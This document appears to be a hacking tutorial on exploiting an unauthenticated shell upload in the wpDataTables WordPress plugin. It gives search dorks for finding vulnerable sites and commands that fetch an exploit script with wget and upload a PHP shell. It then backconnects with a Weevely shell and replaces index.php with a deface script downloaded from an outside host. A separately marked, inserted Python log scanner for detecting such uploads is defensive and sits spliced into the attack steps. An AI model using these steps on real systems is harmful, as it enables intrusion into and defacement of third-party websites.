Exploit WordPress: wpDataTables Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass
Uploading Shell
Requirements:
1- Python, any version (v2.7 recommended)
2- Exploit Script
3- Backdoor
Steps:
1- Download Exploit
wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt
2- Rename the download so it has the .py extension
mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py
3- Find Vulnerable Target using dork
inurl:/plugins/wpdatatables
inurl:codecanyon-3958969
index of "wpdatatables"
index of "codecanyon-3958969"
4- Open cmd/terminal and run the exploit script
python wpdatatables_shell_up.py -t targetsite.com -f shell.php
5- The shell is uploaded to
http://targetsite.com/wp-content/YEAR/MONTH/shell.php
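For defenders, the landing path in step 5 is the clearest trace of this upload: a date-based media folder should never serve PHP. The following added example (not part of the original post or of the exploit script) scans access log lines in Combined Log Format for such requests; the optional uploads/ path segment, the function names and the sample log lines are assumptions constructed here.

```python
import re

# Date-based media folders hold uploads, never executable PHP. The page gives the
# landing path as wp-content/YEAR/MONTH/; the optional "uploads/" segment is an
# assumption added here to also cover the stock WordPress media layout.
UPLOADED_PHP = re.compile(
    r"/wp-content/(?:uploads/)?(?:19|20)\d{2}/(?:0[1-9]|1[0-2])/"
    r"[^/?\s]+\.ph(?:p\d?|tml)(?:[/?]|$)",
    re.IGNORECASE,
)
# Combined Log Format: host ident user [time] "METHOD path proto" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

def find_upload_php_hits(lines):
    """Return (ip, time, method, path, status) for requests to PHP in a media folder."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and UPLOADED_PHP.search(m["path"]):
            hits.append((m["ip"], m["ts"], m["method"], m["path"], int(m["status"])))
    return hits

def served(hits):
    """Hits answered with 2xx: the file exists and the server ran or returned it."""
    return [h for h in hits if 200 <= h[4] < 300]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.4 - - [12/Nov/2014:09:58:10 +0000] "GET /wp-content/uploads/2014/11/logo.png HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Nov/2014:10:01:22 +0000] "GET /wp-content/2014/11/shell.php HTTP/1.1" 200 312',
    '203.0.113.7 - - [12/Nov/2014:10:01:40 +0000] "POST /wp-content/uploads/2014/11/shell.php HTTP/1.1" 200 48',
    '192.0.2.15 - - [12/Nov/2014:10:05:03 +0000] "GET /wp-content/uploads/2013/02/x.php HTTP/1.1" 404 209',
    '198.51.100.4 - - [12/Nov/2014:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 9800',
]

if __name__ == "__main__":
    for ip, ts, method, path, status in find_upload_php_hits(SAMPLE_LOG):
        print(f"{ts} {ip} {method} {path} -> {status}")
```

A 2xx hit means the file is present and was served, so that host needs incident response; a 404 is a probe. Denying PHP execution in the media directories at the web server removes this path regardless of the plugin version.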
Bypassing Not Acceptable
Requirements:
1- Weevely Stealth Shell
2- Remote Deface Script (.txt)
Steps:
1- Upload weevely stealth shell using the exploit script
2- Backconnect using weevely
3- CD to root directory
4- Backup index.php
mv index.php indexBAK.php
5- Import Deface Script
wget http://yourhosting.com/index.txt -O index.php